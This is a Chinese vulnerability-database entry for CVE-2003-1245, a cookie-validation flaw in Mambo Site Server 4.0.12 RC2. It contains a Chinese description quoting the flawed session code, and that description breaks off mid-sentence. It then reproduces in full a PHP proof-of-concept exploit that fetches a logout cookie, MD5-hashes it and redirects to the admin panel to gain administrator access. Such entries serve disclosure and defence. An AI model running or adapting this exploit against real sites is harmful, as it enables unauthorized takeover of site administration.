Mambo Site Server Cookie信息确认漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107218 漏洞类型 访问验证错误
发布时间 2003-02-24 更新时间 2006-01-17
CVE编号 CVE-2003-1245 CNNVD-ID CNNVD-200312-380
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/22281
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-380
|漏洞详情
MamboSiteServer是一款免费开放源代码WEB内容管理工具,由PHP编写。MamboSiteServer在进行授权访问的时候没有充分确认基于Cookie验证的信息,远程攻击者可以利用这个漏洞使用特殊Cookie访问管理页面。/administrator/index2.php脚本存在漏洞,如果用户知道会话表中的sessionid的情况下,就可以以管理员权限访问Mambo服务器。一般的PHP设计让你设置Cookie时,如果页面不被刷新Cookie是不会被更新的,MamboSiteServer包含如下代码:setcookie("sessioncookie","$sessionID");if($HTTP_COOKIE_VARS["sessioncookie"]!=""){$query="INSERTinto".$dbprefix."sessionsetsession_id='$cryptSessionID',guest='',userid='$uid',usertype='$usertype',gid='$gid',username='$username'";$database->openConnectionNoReturn($query);}我们可以看到,MamboSiteServer在插入sessionid到会话表之前会检查COOKIE是否设置,如果没有设置,就没有会话ID插入也就不能登录访问管理员目录,但是查看SessionCookie.php代码,我们可以看到只要你退出就会把sessionid插入:$current_time=time();if($HTTP_COOKIE_VARS["sessioncookie"]==""){$randnum=getSessionID1();...$cryptrandnum=md5($randnum);...setcookie("sessioncookie","$randnum");$guest=1;$query="INSERTinto".$dbprefix."sessionSETusername='',time=$current_time,session_id='$cryptrandnum',guest=$guest";$database->openConnectionNoReturn($query);}因此,如果某个CO
|漏洞EXP
source: http://www.securityfocus.com/bid/6926/info

Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie.

This issue was reported in Mambo Site Server 4.0.12 RC2. Earlier versions may also be affected. 

<?php 
/* 
���mamboexp.php - Mambo 4.0.12 RC2 exploit - Proof of concept 
���Copyright (C) 2003��Simen Bergo (sbergo@thesource.no) 
���This program is free software; you can redistribute it and/or 
���modify it under the terms of the GNU General Public License 
���as published by the Free Software Foundation; either version 2 of 
���the License or (at your option) any later version. 
���This program is distributed in the hope that it will be 
���useful, but WITHOUT ANY WARRANTY; without even the implied warranty 
���of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.��See the 
���GNU General Public License for more details. 
���You should have received a copy of the GNU General Public License 
���along with this program; if not, write to the Free Software 
���Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA��02111-1307, USA. 
*/ 
/* 
���The problem is that Mambo Site Server does not check whether or not 
���the sessionid is created by the administrator login, or any other 
���part of the website. 
���This program will first connect to /index.php?option=logout which 
���hands us a cookie. Then we will md5() encrypt this cookie and "login" 
���at the administrator section. 
*/ 
���� 
����# Check if form was submitted 
����if (isset ($_POST['submit'])) { 
��������# Connect to server 
��������$handle = fsockopen ($_POST['hostname'], 80, &$errno, &$errstr); 
��������# Halt processing if we we're unable to connect 
��������if (!$handle) { die ("Unable to connect to <b>$hostname</b>"); } 
��������else { 
������������# Get the webpage which will give us the cookie 
������������fputs ($handle, "GET /" . trim($_POST['maindir'], "\x5c \x2f") . "/index.php?option=logout HTTP/1.0\nHost: 
{$_POST['hostname']}\n\n"); 
������������# Loop through the contents 
������������$buffer = ""; 
������������while (!feof ($handle)) { 
����������������$buffer .= fgets ($handle, 2000); 
������������} 
������������# Create an array with each line as a seperate value 
������������$arr = explode ("\n", $buffer); 
������������# Loop through the array looking for the cookie 
������������foreach ($arr as $value) { 
����������������# If we have found the cookie, proceed 
����������������if (eregi ("Set-Cookie: sessioncookie=", $value)) { 
��������������������# Explode again, to sort out the sessionid 
��������������������$var = explode ("=", $value); 
��������������������# Now that we have all the information we need, we can redirect 
��������������������header ("Location: http://{$_POST['hostname']}/" . 
���������������������������� trim($_POST['admdir'], "\x5c \x2f") . "/index2.php?session_id=" . md5(trim($var[1]))); 
����������������} 
������������} 
��������} 
����} 
?> 
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST"> 
��<table border="0" cellspacing="0" cellpadding="0"> 
����<tr> 
������<td width="120" height="30">Hostname</td> 
������<td width="280" height="30"><input type="text" name="hostname" size="30" value="www.mamboserver.com"/></td> 
����</tr> 
����<tr> 
������<td width="120" height="30">Main directory</td> 
������<td width="280" height="30"><input type="text" name="maindir" size="30" value=""/></td> 
����</tr> 
����<tr> 
������<td width="120" height="30">Admin directory</td> 
������<td width="280" height="30"><input type="text" name="admdir" size="30" value="administrator"/></td> 
����</tr> 
����<tr> 
������<td width="120" height="30"></td> 
������<td width="280" height="30"><input type="submit" value="Gain access" name="submit"/> <input type="reset" 
value="Reset"/></td> 
����</tr> 
��</table> 
</form>
|参考资料

来源:BID
名称:6926
链接:http://www.securityfocus.com/bid/6926
来源:XF
名称:mambo-sessionid-gain-privileges(11398)
链接:http://xforce.iss.net/xforce/xfdb/11398
来源:BUGTRAQ
名称:20030224MamboSiteServerexploitgainsadministrativeprivileges
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0302.html
来源:NSFOCUS
名称:4524
链接:http://www.nsfocus.net/vulndb/4524